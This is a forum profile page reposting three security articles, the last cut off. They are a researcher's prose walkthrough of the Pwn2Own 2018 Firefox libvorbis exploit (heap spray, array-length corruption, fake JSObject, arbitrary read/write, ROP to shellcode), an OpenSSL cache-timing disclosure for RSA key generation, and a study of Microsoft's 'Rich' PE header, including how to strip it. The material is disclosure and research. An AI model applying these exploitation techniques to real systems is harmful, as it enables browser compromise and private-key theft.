Jump to content

Nytro

Administrators
  • Posts

    18785
  • Joined

  • Last visited

  • Days Won

    738

Everything posted by Nytro

  1. How to kill a (Fire)fox – en 2018 年 4 月 16 日 admin001 写评论 Pwn2own 2018 Firefox case study Author: Hanming Zhang from 360 vulcan team 1. Debug Environment OS Windows 10 Firefox_Setup_59.0.exe SHA1: 294460F0287BCF5601193DCA0A90DB8FE740487C Xul.dll SHA1: E93D1E5AF21EB90DC8804F0503483F39D5B184A9 2. Patch Infomation The issue in Mozilla’s Bugzilla is Bug 1446062. The vulnerability used in pwn2own 2018 is assigned with CVE-2018-5146. From the Mozilla security advisory, we can see this vulnerability came from libvorbis – a third-party media library. In next section, I will introduce some base information of this library. 3. Ogg and Vorbis 3.1. Ogg Ogg is a free, open container format maintained by the Xiph.Org Foundation. One “Ogg file” consist of some “Ogg Page” and one “Ogg Page” contains one Ogg Header and one Segment Table. The structure of Ogg Page can be illustrate as follow picture. Pic.1 Ogg Page Structure 3.2. Vorbis Vorbis is a free and open-source software project headed by the Xiph.Org Foundation. In a Ogg file, data relative to Vorbis will be encapsulated into Segment Table inside of Ogg Page. One MIT document show the process of encapsulation. 3.2.1. Vorbis Header In Vorbis, there are three kinds of Vorbis Header. For one Vorbis bitstream, all three kinds of Vorbis header shound been set. And those Header are: Vorbis Identification Header Basically define Ogg bitstream is in Vorbis format. And it contains some information such as Vorbis version, basic audio information relative to this bitstream, include number of channel, bitrate. Vorbis Comment Header Basically contains some user define comment, such as Vendor infomation。 Vorbis Setup Header Basically contains information use to setup codec, such as complete VQ and Huffman codebooks used in decode. 3.2.2. Vorbis Identification Header Vorbis Identification Header structure can be illustrated as follow: Pic.2 Vorbis Identification Header Structure 3.2.3. Vorbis Setup Header Vorbis Setup Heade Structure is more complicate than other headers, it contain some substructure, such as codebooks. After “vorbis” there was the number of CodeBooks, and following with CodeBook Objcet corresponding to the number. And next was TimeBackends, FloorBackends, ResiduesBackends, MapBackends, Modes. Vorbis Setup Header Structure can be roughly illustrated as follow: Pic.3 Vorbis Setup Header Structure 3.2.3.1. Vorbis CodeBook As in Vorbis spec, a CodeBook structure can be represent as follow: byte 0: [ 0 1 0 0 0 0 1 0 ] (0x42) byte 1: [ 0 1 0 0 0 0 1 1 ] (0x43) byte 2: [ 0 1 0 1 0 1 1 0 ] (0x56) byte 3: [ X X X X X X X X ] byte 4: [ X X X X X X X X ] [codebook_dimensions] (16 bit unsigned) byte 5: [ X X X X X X X X ] byte 6: [ X X X X X X X X ] byte 7: [ X X X X X X X X ] [codebook_entries] (24 bit unsigned) byte 8: [ X ] [ordered] (1 bit) byte 8: [ X 1 ] [sparse] flag (1 bit) After the header, there was a length_table array which length equal to codebook_entries. Element of this array can be 5 bit or 6 bit long, base on the flag. Following as VQ-relative structure: [codebook_lookup_type] 4 bits [codebook_minimum_value] 32 bits [codebook_delta_value] 32 bits [codebook_value_bits] 4 bits and plus one [codebook_sequence_p] 1 bits Finally was a VQ-table array with length equal to codebook_dimensions * codebook_entrue,element length Corresponding to codebood_value_bits. Codebook_minimum_value and codebook_delta_value will be represent in float type, but for support different platform, Vorbis spec define a internal represent format of “float”, then using system math function to bake it into system float type. In Windows, it will be turn into double first than float. All of above build a CodeBook structure. 3.2.3.2. Vorbis Time In nowadays Vorbis spec, this data structure is nothing but a placeholder, all of it data should be zero. 3.2.3.3. Vorbis Floor In recent Vorbis spec, there were two different FloorBackend structure, but it will do nothing relative to vulnerability. So we just skip this data structure. 3.2.3.4. Vorbis Residue In recent Vorbis spec, there were three kinds of ResidueBackend, different structure will call different decode function in decode process. It’s structure can be presented as follow: [residue_begin] 24 bits [residue_end] 24 bits [residue_partition_size] 24 bits and plus one [residue_classifications] = 6 bits and plus one [residue_classbook] 8 bits The residue_classbook define which CodeBook will be used when decode this ResidueBackend. MapBackend and Mode dose not have influence to exploit so we skip them too. 4. Patch analysis 4.1. Patched Function From blog of ZDI, we can see vulnerability inside following function: /* decode vector / dim granularity gaurding is done in the upper layer */ long vorbis_book_decodev_add(codebook *book, float *a, oggpack_buffer *b, int n) { if (book->used_entries > 0) { int i, j, entry; float *t; if (book->dim > 8) { for (i = 0; i < n;) { entry = decode_packed_entry_number(book, b); if (entry == -1) return (-1); t = book->valuelist + entry * book->dim; for (j = 0; j < book->dim;) { a[i++] += t[j++]; } } else { // blablabla } } return (0); } Inside first if branch, there was a nested loop. Inside loop use a variable “book->dim” without check to stop loop, but it also change a variable “i” come from outer loop. So if ”book->dim > n”, “a[i++] += t[j++]” will lead to a out-of-bound-write security issue. In this function, “a” was one of the arguments, and t was calculate from “book->valuelist”. 4.2. Buffer – a After read some source , I found “a” was initialization in below code: /* alloc pcm passback storage */ vb->pcmend=ci->blocksizes[vb->W]; vb->pcm=_vorbis_block_alloc(vb,sizeof(*vb->pcm)*vi->channels); for(i=0;ichannels;i++) vb->pcm=_vorbis_block_alloc(vb,vb->pcmend*sizeof(*vb->pcm)); The “vb->pcm” will be pass into vulnerable function as “a”, and it’s memory chunk was alloc by _vorbis_block_alloc with size equal to vb->pcmend*sizeof(*vb->pcm). And vb->pcmend come from ci->blocksizes[vb->W], ci->blocksizes was defined in Vorbis Identification Header. So we can control the size of memory chunk alloc for “a”. Digging deep into _vorbis_block_alloc, we can found this call chain _vorbis_block_alloc -> _ogg_malloc -> CountingMalloc::Malloc -> arena_t::Malloc, so the memory chunk of “a” was lie on mozJemalloc heap. 4.3. Buffer – t After read some source code , I found book->valuelist get its value from here: c->valuelist=_book_unquantize(s,n,sortindex); And the logic of _book_unquantize can be show as follow: float *_book_unquantize(const static_codebook *b, int n, int *sparsemap) { long j, k, count = 0; if (b->maptype == 1 || b->maptype == 2) { int quantvals; float mindel = _float32_unpack(b->q_min); float delta = _float32_unpack(b->q_delta); float *r = _ogg_calloc(n * b->dim, sizeof(*r)); switch (b->maptype) { case 1: quantvals=_book_maptype1_quantvals(b); // do some math work break; case 2: float val=b->quantlist[j*b->dim+k]; // do some math work break; } return (r); } return (NULL); } So book->valuelist was the data decode from corresponding CodeBook’s VQ data. It was lie on mozJemalloc heap too. 4.4. Cola Time So now we can see, when the vulnerability was triggered: a lie on mozJemalloc heap; size controllable. t lie on mozJemalloc heap too; content controllable. book->dim content controllable. Combine all thing above, we can do a write operation in mozJemalloc heap with a controllable offset and content. But what about size controllable? Can this work for our exploit? Let’s see how mozJemalloc work. 5. mozJemalloc mozJemalloc is a heap manager Mozilla develop base on Jemalloc. Following was some global variables can show you some information about mozJemalloc. gArenas mDefaultArena mArenas mPrivateArenas gChunkBySize gChunkByAddress gChunkRTress In mozJemalloc, memory will be divide into Chunks, and those chunk will be attach to different Arena. Arena will manage chunk. User alloc memory chunk must be inside one of the chunks. In mozJemalloc, we call user alloc memory chunk as region. And Chunk will be divide into run with different size.Each run will bookkeeping region status inside it through a bitmap structure. 5.1. Arena In mozJemalloc, each Arena will be assigned with a id. When allocator need to alloc a memory chunk, it can use id to get corresponding Arena. There was a structure call mBin inside Arena. It was a array, each element of it wat a arena_bin_t object, and this object manage all same size memory chunk in this Arena. Memory chunk size from 0x10 to 0x800 will be managed by mBin. Run used by mBin can not be guarantee to be contiguous, so mBin using a red-black-tree to manage Run. 5.2. Run The first one region inside a Run will be use to save Run manage information, and rest of the region can be use when alloc. All region in same Run have same size. When alloc region from a Run, it will return first No-in-use region close to Run header. 5.3. Arena Partition This now code branch in mozilla-central, all JavaScript memory alloc or free will pass moz_arena_ prefix function. And this function will only use Arena which id was 1. In mozJemalloc, Arena can be a PrivateArena or not a PrivateArena. Arena with id 1 will be a PrivateArena. So it means that ogg buffer will not be in the same Arena with JavaScript Object. In this situation, we can say that JavaScript Arena was isolated with other Arenas. But in vulnerable Windows Firefox 59.0 does not have a PrivateArena, so that we can using JavaScript Object to perform a Heap feng shui to run a exploit. First I was debug in a Linux opt+debug build Firefox, as Arena partition, it was hard to found a way to write a exploit, so far I can only get a info leak situation in Linux. 6. Exploit In the section, I will show how to build a exploit base on this vulnerability. 6.1. Build Ogg file First of all, we need to build a ogg file which can trigger this vulnerability, some of PoC ogg file data as follow: Pic.4 PoC Ogg file partial data We can see codebook->dim equal to 0x48。 6.2. Heap Spary First we alloc a lot JavaScript avrray, it will exhaust all useable memory region in mBin, and therefore mozJemalloc have to map new memory and divide it into Run for mBin. Then we interleaved free those array, therefore there will be many hole inside mBin, but as we can never know the original layout of mBin, and there can be other object or thread using mBin when we free array, the hole may not be interleaved. If the hole is not interleaved, our ogg buffer may be malloc in a contiguous hole, in this situation, we can not control too much off data. So to avoid above situation, after interleaved free, we should do some compensate to mBin so that we can malloc ogg buffer in a hole before a array. 6.3. Modify Array Length After Heap Spary,we can use _ogg_malloc to malloc region in mozJemalloc heap. So we can force a memory layout as follow: |———————contiguous memory —————————| [ hole ][ Array ][ ogg_malloc_buffer ][ Array ][ hole ] And we trigger a out-of-bound write operation, we can modify one of the array’s length. So that we have a array object in mozJemalloc which can read out-of-bound. Then we alloc many ArrayBuffer Object in mozJemalloc. Memory layout turn into following situation: |——————————-contiguous memory —————————| [ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents ] In this situation, we can use Array_length_modified to read/write ArrayBuffer_contents. Finally memory will like this: |——————————-contiguous memory —————————| [ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents_modified ] 6.4. Cola time again Now we control those object and we can do: Array_length_modified Out-of-bound write Out-of-bound read ArrayBuffer_contents_modified In-bound write In-bound read If we try to leak memory data from Array_length_modified, due to SpiderMonkey use tagged value, we will read “NaN” from memory. But if we use Array_length_modified to write something in ArrayBuffer_contents_modified, and read it from ArrayBuffer_contents_modified. We can leak pointer of Javascript Object from memory. 6.5. Fake JSObject We can fake a JSObject on memory by leak some pointer and write it into JavasScript Object. And we can write to a address through this Fake Object. (turn off baselineJIT will help you to see what is going on and following contents will base on baselineJIT disable) Pic.5 Fake JavaScript Object If we alloc two arraybuffer with same size, they will in contiguous memory inside JS::Nursery heap. Memory layout will be like follow |———————contiguous memory —————————| [ ArrayBuffer_1 ] [ ArrayBuffer_2 ] And we can change first arraybuffer’s metadata to make SpiderMonkey think it cover second arraybuffer by use fake object trick. |———————contiguous memory —————————| [ ArrayBuffer_1 ] [ ArrayBuffer_2 ] We can read/write to arbitrarily memory now. After this, all you need was a ROP chain to get Firefox to your shellcode. 6.6. Pop Calc? Finally we achieve our shellcode, process context as follow: Pic.6 achieve shellcode Corresponding memory chunk information as follow: Pic.7 memory address information But Firefox release have enable Sandbox as default, so if you try to pop calc through CreateProcess, Sandbox will block it. 7. Relative code and works Firefox Source Code OR’LYEH? The Shadow over Firefox by argp Exploiting the jemalloc Memory Allocator: Owning Firefox’s Heap by argp,haku QUICKLY PWNED, QUICKLY PATCHED: DETAILS OF THE MOZILLA PWN2OWN EXPLOIT by thezdi Sursa: http://blogs.360.cn/blog/how-to-kill-a-firefox-en/
  2. From: Billy Brumley <bbrumley () gmail com> Date: Mon, 16 Apr 2018 19:46:03 +0300 Hey Folks, We discovered 3 vulnerabilities in OpenSSL that allow cache-timing enabled attackers to recover RSA private keys during key generation. 1. BN_gcd gets called to check that _e_ and _p-1_ are relatively prime. This function is not constant time, and leaks critical GCD state leading to information on _p_. 2. During primality testing, BN_mod_inverse gets called without the BN_FLG_CONSTTIME set during Montgomery arithmetic setup. The resulting code path is not constant time, and leaks critical GCD state leading to information on _p_. 3. During primality testing, BN_mod_exp_mont gets called without the BN_FLG_CONSTTIME set during modular exponentiation, with an exponent _x_ satisfying _p - 1 = 2**k * x_ hence recovering _x_ gives you most of _p_. The resulting code path is not constant time, and leaks critical exponentiation state leading to information on _x_ and hence _p_. OpenSSL issued CVE-2018-0737 to track this issue. # Affected software LibreSSL fixed these issues (nice!) way back when this was reported in Jan 2017. Looks like commits 5a1bc054398ec4d2c33e5bdc3a16eece01c8901d 952c1252f58f5f57227f5efaeec0169759c77d72 We verified that with a debugger. OTOH, OpenSSL wanted concrete evidence of exploitability. That's what we did over the past year and a half or so.We ran with bug (1) and recover RSA keys with cache-timings, achieving roughly 30% success rate in over 10K trials on a cluster. Affects 1.1.0, 1.0.2, and presumably all the EOL lines. ## Fixes Recently, it looks like (1) was independently discovered, and some code changes happened. Nothing for (2) and (3). ### 1.0.2-stable Part of the fix (1) is in commits 0d6710289307d277ebc3354105c965b6e8ba8eb0 64eb614ccc7ccf30cc412b736f509f1d82bbf897 0b199a883e9170cdfe8e61c150bbaf8d8951f3e7 In combination with our contributed patch in 349a41da1ad88ad87825414752a8ff5fdd6a6c3f we verified with a debugger they cumulatively solve (1) (2) and (3). ### 1.1.0-stable Part of the fix (1) is in commits 7150a4720af7913cae16f2e4eaf768b578c0b298 011f82e66f4bf131c733fd41a8390039859aafb2 9db724cfede4ba7a3668bff533973ee70145ec07 In combination with our contributed patch in 6939eab03a6e23d2bd2c3f5e34fe1d48e542e787 we verified with a debugger they cumulatively solve (1) (2) and (3). Look for our preprint on http://eprint.iacr.org/ soon -- working title is "One Shot, One Trace, One Key: Cache-Timing Attacks on RSA Key Generation". We'll update the list with the full URL once it's posted. # Timeline Jan 2017: Notified OpenSSL, LibreSSL, BoringSSL 4 Apr 2018: Notified OpenSSL again, with PoC and 16 Apr, 15:00 UTC embargo 11 Apr 2018: Notified distros list 16 Apr 2018: Notified oss-security list Thanks for reading! Alejandro Cabrera Aldaya Cesar Pereida Garcia Luis Manuel Alvarez Tapia Billy Brumley Sursa: http://seclists.org/oss-sec/2018/q2/50
  3. he Undocumented Microsoft "Rich" Header Date: Mar 12, 2017 Last-Modified: Feb 28, 2018 SUMMARY: There is a bizarre undocumented structure that exists only in Microsoft-produced executables. You may have never noticed the structure even if you've scanned past it a thousand times in a hex dump. This linker-generated structure is present in millions of EXE, DLL and driver modules across the globe built after the late 90's. This was when proprietary features were introduced into both Microsoft compilers and the Microsoft Linker to facilitate its generation. If you view the first 256 bytes of almost any module built with Microsoft development tools (such as Visual C++) or those that ship with the Windows operating system, such as KERNEL32.DLL from Windows XP SP3 (shown below), you can easily spot the signature in a hex viewer. Just look for the word "Rich" after the sequence "This program cannot be run in DOS mode": 00000000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ.............. <--DOS header 00000010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 ................ 00000040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 ........!..L.!Th <--DOS STUB 00000050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f is program canno 00000060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 t be run in DOS 00000070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 mode....$....... 00000080 17 86 20 aa 53 e7 4e f9 53 e7 4e f9 53 e7 4e f9 .. .S.N.S.N.S.N. <--Start of "Rich" Header 00000090 53 e7 4f f9 d9 e6 4e f9 90 e8 13 f9 50 e7 4e f9 S.O...N.....P.N. 000000A0 90 e8 12 f9 52 e7 4e f9 90 e8 10 f9 52 e7 4e f9 ....R.N.....R.N. 000000B0 90 e8 41 f9 56 e7 4e f9 90 e8 11 f9 8e e7 4e f9 ..A.V.N.......N. 000000C0 90 e8 2e f9 57 e7 4e f9 90 e8 14 f9 52 e7 4e f9 ....W.N.....R.N. 000000D0 52 69 63 68 53 e7 4e f9 00 00 00 00 00 00 00 00 RichS.N......... <--End of "Rich" header 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000F0 50 45 00 00 4c 01 04 00 2c a1 02 48 00 00 00 00 PE..L...,..H.... <--PE header When present, the "Rich" signature (DWORD value 0x68636952) can be found sandwiched (maybe "camouflaged" is a better word) between the DOS and PE headers of a Windows PE (portable executable) image. I say camouflaged, because it appears, perhaps by Microsoft's original design, to be part of the 16-bit DOS stub code, which it is not. Since many programmer probably weren't versed with 16-bit assembly even when Microsoft introduced this structure, you could argue the decision to embed something at this particular location in every executable was certainly a strategic one to help it hide in plain sight. In Microsoft-linked executables, not only does the DOS mode string begin at predictable offset 0x4E, but the "Rich" structure always seems to appear at offset 0x80; this makes sense as the DOS header has probably been hardcoded for quite some time. Oddly enough, the "Rich" signature actually marks the end of the structure's data, whose size varies. Therefore the position of the signature as well as the total size of the structure changes from module to module. The 32-bit value that follows the signature not only marks the end of the structure itself, it happens to be the key that is used to decrypt the structure's data. Following this structure is the PE header, with a handful of zero-padded bytes in between. Since this is an undocumented "feature" of the Microsoft linker, it is not surprising that there is no known option to disable it, short of patching (discussed below). At the time of discovery, all executables built using Microsoft language tools contained this structure (e.g. Visual C++, Visual Basic 6.x and below, MASM, etc.) causing many developers to fear the worst. Two "seemingly" identical installations of Visual Studio building the same source code appeared to produce executables with differing "Rich" headers. This combined with the fact that the structure was encrypted led many to the assumption that Microsoft was embedding personally identifiable information, ultimately allowing any given executable to be traced back to the machine it was built with. An old 2007 post on the Sysinternals forum refers to this structure the "Devil's Mark". Also of interest is a 2008 report on Donationcoder that Microsoft utilized the information from this structure as "evidence against several high-profile virus writers". A post from Garage4Hackers said "Microsoft uses compiler ids to prove that a virus is made on a particular machine with a particular compiler. Proving that the person owning the computer is the virus writer". Note that while this structure is present in some .NET executables, it is not present in those that do not make use of the Microsoft linker. For example, an application composed purely of .NET Intermediate Language such as C# does not contain this structure. For any given executable module, you can check for the existence of the "Rich" header (in addition to viewing the decoded fields) using the pelook tool tool with the -rh option. Before jumping to any conclusions, lets see what Microsoft is hiding here. AN ARRAY OF NUMERIC VALUES: First off, the "Rich" header really isn't a header at all. It is a self-contained chunk of data that doesn't reference anything else in the executable and nothing else in the executable references it. The structure was unofficially referred to as a header because it happens to reside in PE header area. The structure happens to be little more than an array of 32-bit (DWORD) values between two markers. If one so chooses, the structure can even be safely zeroed-out from the executable without affecting any functionality. Just ensure you update the PE OptionalHeader's checksum if you alter any bytes in the file; although this is not necessary if the checksum field is zero (disabled). Automated removal is possible through the peupdate tool. More recently, I found that Microsoft's editbin (in version 7.x and up) will also zero-out the "Rich" structure using the undocumented /nostub switch however this also removes the PE header offset from the DOS header effectively breaking the executable. Using editbin is therefore not recommended. Other removal options are discussed in the section, Patching the Microsoft Linker below. In the KERNEL32.DLL sample above, the DWORD following the "Rich" sequence happens to have the value 0xF94EE753. This is the XOR key stored by and calculated by the linker. It is actually a checksum of the DOS header with the e_lfanew (PE header offset) zeroed out, and additionally includes the values of the unencrypted "Rich" array. Using a checksum with encryption will not only obfuscate the values, but it also serves as a rudimentary digital signature. If the checksum is calculated from scratch once the values have been decrypted, but doesn't match the stored key, it can be assumed the structure had been tampered with. For those that go the extra step to recalculate the checksum/key, this simple protection mechanism can be bypassed. To decrypt the array, start with the DWORD just prior to the "Rich" sequence and XOR it with the key. Continue the loop backwards, 4 bytes at a time, until the sequence "DanS" (0x536E6144) is decrypted. This value marks the start of the structure, and in practice always seems to reside at offset 0x80. I think a lot of tools that parse the "Rich" structure rely on it starting at offset 0x80. I'd personally recommend against relying on this fact and parsing backwards from the "Rich" signature as described above to handle situations where this may not be the case. Since this is an undocumented structure, I think its best to avoid any assumptions such as hardcoded offsets, especially since you must search for the signature "Rich" anyway. With that said, I have yet to encounter an executable where offset 0x80 is not the start; that is, if the structure is present at all. Following the decoding procedure using the KERNEL32.DLL sample shown above, we end up with following "Rich" structure where all values have been decrypted, and the array is listed beginning at offset 0x80 in ascending order: OFFSET DATA ------ ---------- 0080 0x536E6144 //"DanS" signature (decrypted) / START MARKER 0084 0x00000000 //padding 0088 0x00000000 //padding 008C 0x00000000 //padding 0090 0x00010000 //1st id/value pair entry #1 0094 0x0000018A //1st use count id1=0,uses=394 0098 0x005D0FC3 //2nd id/value pair entry #2 009C 0x00000003 //2nd use count id93=4035,uses=3 00A0 0x005C0FC3 //3rd id/value pair entry #3 00A4 0x00000001 //3rd use count id92=4035,uses=1 00A8 0x005E0FC3 //4th id/value pair entry #4 00AC 0x00000001 //4th use count id94=4035,uses=1 00B0 0x000F0FC3 //5th id/value pair entry #5 00B4 0x00000005 //5th use count id15=4035,uses=5 00B8 0x005F0FC3 //6th id/value pair entry #6 00BC 0x000000DD //6th use count id95=4035,uses=221 00C0 0x00600FC3 //7th id/value pair entry #7 00C4 0x00000004 //7th use count id96=4035,uses=4 00C8 0x005A0FC3 //8th id/value pair entry #8 00CC 0x00000001 //8th use count id90=4035,uses=1 00D0 0x68636952 //"Rich" signature END MARKER 00D4 0xF94EE753 //XOR key The array stores entries that are 8-bytes each, broken into 3 members. Each entry represents either a tool that was employed as part of building the executable or a statistic. You'll notice there are some zero-padded DWORDs adjacent to the "DanS" start marker. In practice, Microsoft seems to have wanted the entries to begin on a 16-byte (paragraph) boundary, so the 3 leading padding DWORDs can be safely skipped as not belonging to the data. Each 8-byte entry consists of two 16-bit WORD values followed by a 32-bit DWORD. The HIGH order WORD is an id which indicates the entry type. The LOW order WORD contains the build number of the tool being represented (when applicable), or it may be set to zero. The next DWORD is a full 32-bit "use" or "occurrence" count. THE ID VALUE: The id value indicates the type of the list entry. For example, a specific id will represent OBJ files generated as a result of the use of a specific version of the C compiler. Different ids represent other tools that were also employed as part of building the final executable, such as the linker. Daniel Pistelli's article, Microsoft's Rich Signature (undocumented), found that the id values are a private enumeration that change between releases of Visual Studio. I have also found this to be the case, which unfortunately makes them a bit of a moving target to decipher. Besides a couple exceptions which I'll explain below, the id is emitted by each compiler (or assembler) and is stored within each OBJ (and thus LIB) files linked against in the form of the "@comp.id" symbol. The "@comp.id" symbol happens to be short for "compiler build number" and "id". In fact, the DWORD value stored as the "@comp.id" symbol is the same DWORD being stored in the first half of applicable "Rich" list entries. I say applicable because not all list entries represent OBJ files. Some ids can appear more than once in the list, while others do not. The id typically represents the following statistics: OBJ count for specific C compiler (cl.exe) OBJ count for specific C++ compiler (cl.exe) OBJ count for specific assembler (ml.exe) specific linker that built module (link.exe) specific resource compiler (rc.exe), when RES file linked imported functions count MSIL modules PGO Instrumented modules and so on... Most of the entries above have an associated build number of the tool being represented, such as the compiler, assembler and linker. One exception to this is the imported functions count, which happens to be the total number of imported functions referenced in all DLLs. This is usually the only entry with a build number of zero. Note that the "Rich" structure does not store information on the number of static/private functions within each OBJ/source file. The linker entry is always last in the list and represents the linker that built the module. The resource compiler, when present, is almost always 2nd to last in the list; next to the linker. Both the linker and resource compiler are represented by a hardcoded id and build values for each linker release. For example, when a resource script is employed, the linker uses the same id/build pair even if the RES is built from a resource compiler from another version of Visual Studio! Another oddity is the build value of the resource compiler entry typically does not match the build reported by the rc.exe command line. The correlation of unique build values to specific versions of Visual Studio tools is discussed in more detail below. The linker seems to build most "Rich" structures in the following order, though not necessarily in the order appearing on the command line: Entries representing LIB files Entries representing individual OBJ files Resource Compiler Linker At first glance you might guess that each referenced LIB file would represent one entry in the list, but this is not the case. The linker may may generate one or more entries for each LIB file depending on the number of unique "@comp.id" values found within. Since a LIB file is not much more than a concatenation of OBJ files, the resulting "count" member of these entries are the number of OBJ files referenced in the final executable that contain that exact "@comp.id" value. For example, statically linking to the Standard C Library usually generates assembler and C OBJ entries because that is what constitutes the source files internally used by Microsoft to build LIBCMT.LIB. When you link against this library, the unique "@comp.id" value-pairs are tallied together and the resulting counts are written to the list. With that in mind, the "Rich" structure in KERNEL32.DLL can be annotated as follows: id1=0,uses=394 id93=4035,uses=3 id92=4035,uses=1 id94=4035,uses=1 id15=4035,uses=5 id95=4035,uses=221 id96=4035,uses=4 id90=4035,uses=1 394 imports ??? ??? 1 rc script 5 asm sources 221 C sources 4 C++ sources Linker Here's another annotated example derived from a minimal C++ application linked with a resource script and the Standard C Library built from Visual C++ 7.1: id15=6030,uses=20 id95=6030,uses=68 id93=2067,uses=2 id93=2179,uses=3 id1=0,uses=3; id96=6030,uses=1 id94=3052,uses=1 id90=6030,uses=1 20 asm sources 68 C sources ??? ??? 3 imports 1 C++ source 1 rc script Linker Below is my attempt at a partial list of decoded ids from the version 6 and 7 Visual Studio toolsets based on a little trial and error. Note that many of the ids originate from the LIB files bundled with with the associated Visual C++ SDK versions, as the linker only hardcodes a few of the entries at the end of the list. It is also common to see a reference to MASM even when MASM is not utilized directly by a project as these references are pulled in automatically by the linker or SDK LIB files. Microsoft Visual Studio 6.0 SP6 ID MEANING 1 total count of imported DLL functions referenced; build number is always zero 4 seems to be associated when linking against Standard C Library DLL 19 seems to be associated when statically linking against Standard C Library 6 resource compiler; almost always last in list (when RES file used) and use-count always 1 9 count of OBJ files for Visual Basic 6.0 forms 13 count of OBJ files for Visual Basic 6.0 code 10 count of C OBJ files from specific cl.exe compiler 11 count of C++ OBJ files from specific cl.exe compiler 14 count of assembler OBJ files originating from MASM 6.13 18 count of assembler OBJ files originating from MASM 6.14 42 count of assembler OBJ files originating from MASM 6.15 Microsoft Visual Studio 7.1 SP1 ID MEANING 1 total count of imported DLL functions referenced; build number is always zero; same as in Linker versions 5.0 SP3 and 6.x 15 count of assembler OBJ files originating from MASM 7.x 90 linker; always present and always at end of list; use-count always 1 93 Always seems to be present no matter how the executable was built, but doesn't appear to originate from @comp.id symbols (???) 94 resource compiler; almost always 2nd to last in list (when RES file used) and use-count always 1 95 count of C OBJ files from specific cl.exe compiler 96 count of C++ OBJ files from specific cl.exe compiler Not only do the ids change with each major linker release (sometimes with service packs too), but newer versions of the SDK's LIB files use different and higher id numbers for the same thing, such as the C and C++ compiler. So not only do the build numbers change with each SDK, but the id identifying the type of entry also changes. Unless the idea is to make the header difficult to interpret, the id may be meant to be combined with the build number to provide a unique compiler-that-built-SDK instance statistic which could be used to trace leaked or BETA versions of tools or SDKs. The whole system might also double as another check system, where if the tool ids and reported build versions don't match known publicly released pairs, this would be another indication the entries in the list were tampered with. Without any official word from Microsoft, some of this is pure speculation. The good news is that if you are only interested in detecting modern versions of Visual Studio (7.x and up), the id member can be completely ignored! More information about detection is presented below. WHEN DID MICROSOFT INTRODUCE THE "RICH"-ENABLED LINKER? The short answer is in 1998, with Visual Studio 6.0 (LINK 6.x). The long answer is the final Service Pack for Visual Studio 5.0; that is, the version 5.10.7303 linker introduced with SP3 in 1997 was the first "Rich" capable linker. The catch was that the list this linker produced was practically empty because the compilers at the time (e.g. Visual C++ 5.x, MASM 6.12) did not yet emit the "@comp.id" symbol to the OBJ files. Not surprisingly, the LIB files that shipped with the product's SDK were also missing the "@comp.id" symbol. The result was a "Rich" structure with either a single entry for the imports, or with an additional entry to represent a compiled resource script. If you however link a Visual C++ 6.0 OBJ file with the older 5.0 SP3 (5.10.7303) linker, you will get a proper "Rich" structure because the 6.0 OBJ file contained the "@comp.id" symbol with build information. The 6.0 OBJ files were however incompatible the 5.0 SP2 and earlier linkers; if you attempted to link-in any of these modules using the older linkers, you would run in to error: LNK1106: "invalid file or disk full: cannot seek to 0xXXXXXXXX". This is an indication that in 1997, Microsoft changed the OBJ file format. In summary, the Visual C++ 5.0 SP3 linker and the linker that would be released next with Visual C++ 6.0, both supported a new type of OBJ file. Specifically, the OBJ files that would facilitate the generation of the this new "Rich" structure. CHANGELIST: PRODUCT VERSION YEAR CHANGE Visual Studio 97 (5.0) SP3 1997 First linker capable of producing "Rich" header and supporting new OBJ format to be released with the not-yet-public VC++ 6.0 compiler (cl.exe 12.x); however compiler's at the time did not yet support writing "@comp.id" to OBJ files so the list had minimal information Visual Studio 6.x 1998 Microsoft compilers, including Visual Basic now support writing "@comp.id" symbol to OBJ files; bundled SDK LIB files now contain "@comp.id" build information; as a result, executables built using the Visual C++ 6.0 compiler and linker now get the first "proper" "Rich" headers. Visual Studio 7.0 .NET (2002) 2002 Linker now appends its own entry to the list and is always last; fortunately we now have a predictable entry that is retained in future versions BUILD NUMBERS FOR DETECTION: Before continuing further, I want to stress an important point. There is little preventing someone from either tampering with or completely falsifying the "Rich" header. While this structure may provide useful information for the majority of executables, other signature methods should be utilized in conjunction where accuracy is paramount. Some of these methods may include searching for specific patterns in the headers and/or analysis of the entry-point code. For example the Borland and Watcom linkers can be identified by specific patterns unique to each from their DOS stubs. The presence of a "Rich" header, or lack thereof, doesn't mean Microsoft's linker cannot be detected by other clues. A typical version number for a Microsoft product consists of major and minor numbers (one byte each) followed by a 16-bit build number and sometimes another 16-bit sub-version number. Since we primarily have the build number for each "Rich" entry to go by, how might we distinguish a specific version of Visual Studio from this information? There are at least 3 ways: The MajorLinkerVersion and MinorLinkerVersion members of the PE's OptionalHeader can be combined with the last entry in the "Rich" list (if MajorLinkerVerion >= 7) to construct the full version of the linker. Once the linker is known, one can assume the version of Visual Studio including that linker was responsible for building the executable even if not all inputs came from this version. The build numbers for each release of Visual Studio are almost completely unique which allow build numbers to identify a specific version of the toolset used; that is for id's besides the linker. The one exception I'm aware of is build number 50727. This build number was issued to public releases of both Visual Studio 2005 and 2012. As mentioned above, you might make the distinction by checking the PE MajorLinkerVersion and testing it for 8 and 11 respectively to at least determine the full version of the linker. Because the entry type ids change between releases of Visual Studio, the id in combination with the build number can be used to uniquely identify a version of Visual Studio. Based on the information above, if you want to detect versions of Visual Studio 7.0 and up, things couldn't be easier. If the MajorLinkerVersion in the PE's OptionalHeader is 7 or greater, indicating Visual Studio .NET 7.0 (2002) and up, the last entry in the list always represents the linker that built the module. If that build number corresponds to a known version of Visual Studio, you might consider it safe to assume the compiler is also from the same toolset. As for versions of Visual Studio supporting the "Rich" structure prior to 7.0, the detection rules were a little different because no linker entry was written to the end of the "Rich" list. Perhaps Microsoft figured it was enough that the PE header contained the Major and Minor version for the linker and the build number was not important enough to include. It is interesting to note that the id and build versions embedded within the publicly shipped SDK LIB files are those of non-public releases of Microsoft compilers; this makes sense because Microsoft 